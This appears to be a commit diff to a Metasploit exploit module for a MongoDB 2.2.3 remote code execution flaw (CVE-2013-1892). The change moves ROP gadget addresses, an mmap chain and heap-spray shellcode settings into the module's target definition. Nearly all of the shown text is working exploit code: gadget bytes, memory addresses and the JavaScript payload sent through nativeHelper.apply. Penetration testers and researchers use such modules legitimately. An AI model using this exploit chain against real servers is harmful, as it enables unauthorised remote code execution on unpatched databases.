Put gadgets in Target

Author: agix

modules/exploits/linux/misc/mongod_native_helper.rb

@@ -9,7 +9,7 @@
 
 class Metasploit3 < Msf::Exploit::Remote
 
-  include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::Tcp
 
 	def initialize(info={})
 		super(update_info(info,
@@ -27,10 +27,29 @@ def initialize(info={})
 					[ 'CVE', '2013-1892' ],
 				],
 			'Platform'       => ['linux'],
-			'Arch' => ARCH_X86,
 			'Targets'        =>
 				[
-					[ 'mongod 2.2.3 - 32bits',  { } ]
+					[ 'Linux - mongod 2.2.3 - 32bits',  
+						{
+							'Arch' => ARCH_X86,
+							'mmap' => [
+									0x0816f768,	   #mmap_64@plt
+									0x0c0c0c0c,    #NOPSLED+SHELLCODE  
+									0x0c0c0000,
+									0x00001000,
+									0x00000007,
+									0x00000031,
+									0xffffffff,
+									0x00000000,
+							],
+							'ret' => [0x08055a70], #ret
+							'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]
+							#THIS GADGETS NEED TO BE COMPOSED WITH <0x80 BYTES ONLY
+							'gadget2' => "\\x58\\x71\\x45\\x08", #xchg esp,eax / add esp,0x4 / pop ebx / pop ebp / ret <== this gadget must xchg esp,eax and then increment ESP
+							'gadget3' => "\\x26\\x18\\x35\\x08", #add esp,0x20 / pop esi / pop edi / pop ebp <== this gadget placed before gadget2 increment ESP to escape gadget2
+							'gadget4' => "\\x6c\\x5a\\x05\\x08", #pop eax / ret
+							'gadget5' => "\\x58\\x71\\x45\\x08" #xchg esp,eax
+						} ]
 				],
 			'DefaultTarget' => 0,
 			'License'      => MSF_LICENSE
@@ -39,8 +58,7 @@ def initialize(info={})
 		register_options(
 			[
 				Opt::RPORT(27017),
-				Opt::RHOST(),
-				OptString.new('DB', [ false, "Database to use", ""]),
+				OptString.new('DB', [ true, "Database to use", "admin"]),
 				OptString.new('Collection', [ false, "Collection to use (it must to exist). Better to let empty", ""]),
 				OptString.new('Username', [ false, "Login to use", ""]),
 				OptString.new('Password', [ false, "Password to use", ""])
@@ -77,29 +95,22 @@ def exploit
 				end
 			end
 			print_status("Let's exploit, heap spray could take some time...")
+			
+			my_target = target
 
 			shellcode = Rex::Text.to_unescape(payload.encoded)
 
-			mmap = [
-					0x0816f768,
-					0x0c0c0c0c,      
-					0x0c0c0000,
-					0x00001000,
-					0x00000007,
-					0x00000031,
-					0xffffffff,
-					0x00000000,
-				].pack("V*")
+			mmap = my_target['mmap'].pack("V*")
 
-			ret = [0x08055a70].pack("V*")
+			ret = my_target['ret'].pack("V*")
 
-			gadget1 = "0x836e204" #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]
+			gadget1 = my_target['gadget1']
 
-			#THIS GADGETS NEED TO BE COMPOSED WITH <0x80 BYTES ONLY
-			gadget2 = "\\x58\\x71\\x45\\x08" #xchg esp,eax / add esp,0x4 / pop ebx / pop ebp / ret <== this gadget must xchg esp,eax and then increment ESP
-			gadget3 = "\\x26\\x18\\x35\\x08" #add esp,0x20 / pop esi / pop edi / pop ebp <== this gadget placed before gadget2 increment ESP to escape gadget2
-			gadget4 = "\\x6c\\x5a\\x05\\x08" #pop eax / ret
-			gadget5 = "\\x58\\x71\\x45\\x08" #xchg esp,eax
+			
+			gadget2 = my_target['gadget2']
+			gadget3 = my_target['gadget3']
+			gadget4 = my_target['gadget4']
+			gadget5 = my_target['gadget5']
 
 			shellcode_var="a"+Rex::Text.rand_text_hex(4)
 			sizechunk_var="b"+Rex::Text.rand_text_hex(4)
@@ -132,6 +143,7 @@ def exploit
 			payloadJS << 'nativeHelper.apply({"x" : '+gadget1+'}, '
 			payloadJS << '["A"+"'+gadget3+'"+"'+Rex::Text.rand_text_hex(12)+'"+"'+gadget2+'"+"'+Rex::Text.rand_text_hex(28)+'"+"'+gadget4+'"+"\\x20\\x20\\x20\\x20"+"'+gadget5+'"]);'
 
+
 			request_id = Rex::Text.rand_text(4)
 
 			packet = request_id           #requestID